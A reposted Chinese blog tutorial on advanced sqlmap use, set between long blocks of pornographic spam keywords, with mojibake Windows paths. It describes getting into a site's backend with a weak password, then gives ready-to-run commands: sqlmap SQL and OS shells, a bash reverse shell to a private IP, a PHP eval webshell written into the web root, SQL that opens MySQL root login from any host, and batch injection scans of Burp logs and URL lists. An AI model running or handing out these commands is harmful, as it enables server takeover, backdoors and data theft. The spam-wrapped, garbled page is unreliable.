日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪(fǎng)問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) >

sqlmap自动扫描注入点_同天上降魔主,真是人间太岁神——SQLMAP 高级教程

發(fā)布時(shí)間:2025/3/20 31 豆豆
生活随笔 收集整理的這篇文章主要介紹了 sqlmap自动扫描注入点_同天上降魔主,真是人间太岁神——SQLMAP 高级教程 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

昨天對(duì)一個(gè)網(wǎng)站做滲透測(cè)試,本來(lái)想自己寫(xiě)腳本來(lái)sql注入的,但是覺(jué)得麻煩還是用了sqlmap

這一用發(fā)現(xiàn)sqlmap好多好玩的地方,以前用sqlmap 也就 -r -u ,覺(jué)得這樣就夠用了,直到昨天才發(fā)現(xiàn) 如同天上降魔主,真是人間太歲神 這個(gè)sqlmap……牛x

弱口令進(jìn)入后臺(tái)

發(fā)現(xiàn)sql注入(至少有xor注入)

上sqlmap(因?yàn)閼?

抓包

Sqlmap的 基本流程我就不走了,直接上我發(fā)現(xiàn)的好玩的東西吧

python3 .sqlmap.py -r C:甥敳獲wzwDesktopdd.txt -p searchField --sql-shell

1. 通過(guò)sqlmap連接mysql獲取shell

一、sqlmap 可以直連數(shù)據(jù)庫(kù),之前我都一直用navicat連的

sqlmap.py -d “mysql://root:xxx@x.x.x.x:3306/mysql”–os-shell

二、反彈shell

bash -i >& /dev/tcp/192.168.1.3/8888>&1

三、echo 寫(xiě)shell

echo “<?php @eval($_POST['chopper']);?>” >/var/www/html/1.php

四、讓sql 無(wú)密碼

use mysql;

update userset host = ‘%’ where user = ‘root’;

FLUSHPRIVILEGES ;

有時(shí)候?qū)σ恍┚W(wǎng)站做資產(chǎn)收集(比如護(hù)網(wǎng)的時(shí)候),想對(duì)他們做批量的sql注入檢測(cè)這時(shí)候我們可以配合burp來(lái)進(jìn)行批量注入

1. 首先是burp設(shè)置記錄log

2. 2.把記錄的log文件放sqlmap目錄

3. 3.sqlmap讀log自動(dòng)測(cè)試:

python sqlmap.py -l 文件名 --batch -smart

batch:自動(dòng)選yes。

smart:啟發(fā)式快速判斷,節(jié)約時(shí)間。

最后能注入的url會(huì)保存到out文件夾下

注意:log文件中如果有sqlmap無(wú)法讀取的字符(ascii碼之外的字符)會(huì)讀取失敗。

執(zhí)行命令:sqlmap.py -l burp.log --batch -smart  即可對(duì)burp.log中保存的所有request進(jìn)行注入掃描。

  Batch:會(huì)自動(dòng)選擇yes(這個(gè)很贊,我可不希望一直按 回車(chē)回車(chē)回車(chē)……)

  Smart:啟發(fā)式快速判斷,節(jié)約時(shí)間。

window版的sqlmap最后能注入的URL 會(huì)存儲(chǔ)到C:甥敳獲Administrator.sqlmap文件夾下。

批量注入

Sqlmap可以從文本文件中解析目標(biāo)

url.txt,內(nèi)容為:

? www.target1.com/vuln1.php?q=foobar? www.target2.com/vuln2.asp?id=1? www.target3.com/vuln3/id/1*?可以執(zhí)行?? python sqlmap.py -m url.txt?

同樣,執(zhí)行該命令時(shí),Sqlmap會(huì)很貼心地一個(gè)個(gè)詢(xún)問(wèn):“do you want to test this URL”?顯然sqlmap還沒(méi)通過(guò)圖靈測(cè)試,這并不是我們希望看到的所以

? python sqlmap.py -m url.txt --batch?這樣我門(mén)就可以默認(rèn)回答他”YES i want to test this url”

總結(jié)

以上是生活随笔為你收集整理的sqlmap自动扫描注入点_同天上降魔主,真是人间太岁神——SQLMAP 高级教程的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 色女人av | 美女黄18以下禁止观看 | 天天狠天天透 | 干老太太视频 | 私密spa按摩按到高潮 | 国产在线高潮 | 久久亚洲国产成人精品性色 | 成人做爰黄| 香港一级淫片免费放 | 午夜影视福利 | 奇米一区二区 | 成人日批 | 正在播放亚洲 | 亚洲欧美高清视频 | 9999视频| 国产真实乱人偷精品视频 | 久草免费在线观看视频 | 97国产成人无码精品久久久 | 国产jjizz一区二区三区视频 | 久草福利在线观看 | 波多野结衣视频在线观看 | 四虎视频国产精品免费 | 黄色一级片在线免费观看 | 国产嫩草影视 | 国产吞精囗交免费视频网站 | 看全色黄大色黄大片大学生 | 中文字幕国产精品 | 老司机深夜福利在线观看 | 9久9久9久女女女九九九一九 | 久99精品| 免费激情网址 | 色欲久久久天天天精品综合网 | 男女调教视频 | 色视频免费在线观看 | 色一情一乱一区二区三区 | 日韩骚片 | 日韩一区在线看 | 欧美日韩日本国产 | 播色屋 | 激情网站免费 | 国产在线一区二区视频 | www.久久视频 | 亚洲综合不卡 | 精品国产三级a∨在线 | 天堂av网手机版 | 亚洲高清无码久久久 | 极品少妇xxxx | 女同动漫免费观看高清完整版在线观看 | 日本两性视频 | 夜色一区二区三区 | 亚洲videos | 露出调教羞耻91九色 | 777av| 天天曰| 欧美丰满熟妇bbb久久久 | 欧美18一19性内谢 | 久久夜夜操妹子 | 亚州a级片| 国产不卡视频一区二区三区 | 欧洲在线视频 | 国产亚洲久一区二区 | 天天综合入口 | 日韩av男人的天堂 | 亚洲乱码精品久久久久 | 五月深爱 | 国产精品 日韩 | 偷偷操不一样的久久 | 91资源在线视频 | 亚洲av成人精品毛片 | 奇米在线视频 | www.av在线免费观看 | 黄免费在线观看 | 在线视频91 | 91丝袜一区二区三区 | 国产三级理论片 | xxxxxx日本| 老女人综合网 | 人体毛片| 国产麻豆午夜三级精品 | 国产日本欧美在线观看 | 五月网 | 日韩黄色一区二区 | fc2ppv色の美マンに中出し | 激情小说在线观看 | 欧美xxxx喷水 | 成人www视频 | 好吊色一区二区 | 免费日韩欧美 | 国产视频精品免费 | 手机在线成人 | 男人天堂手机在线 | 亚洲你我色| 欧美性猛交乱大交3 | 日本久久久久久久久久 | 翔田千里88av中文字幕 | 中文字幕精品国产 | 爱就操| 三级黄色视屏 | 一级片免费网站 |